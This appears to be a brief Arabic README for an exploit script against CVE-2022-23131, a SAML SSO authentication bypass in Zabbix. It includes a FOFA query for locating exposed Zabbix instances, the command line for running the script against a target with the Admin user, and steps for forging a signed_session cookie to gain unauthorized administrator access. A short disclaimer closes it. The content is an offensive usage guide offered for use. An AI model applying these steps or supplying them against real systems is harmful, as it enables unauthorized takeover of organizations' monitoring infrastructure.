
استغلال ثغرة CVE-2022-23131 التي تستهدف تجاوز مصادقة SAML SSO في Zabbix. يقوم بإنشاء كلمة جلسة موقعة للحصول على وصول إداري غير مصرح به.
FOFA
app="ZABBIX-监控系统" && body="saml"
تشغيل
python cve-2022-23131.py https://www.example.com Admin
استخدم exp لإنشاء signed_session، واستبدل cookie، ثم انقر على Sign in with Single Sign-On (SAML) الافتراضي هو Admin
(احترام الحدود، العواقب على مسؤوليتك)
لقاء عابر، تحية للأشخاص العاديين الذين لا يرضون بالعادية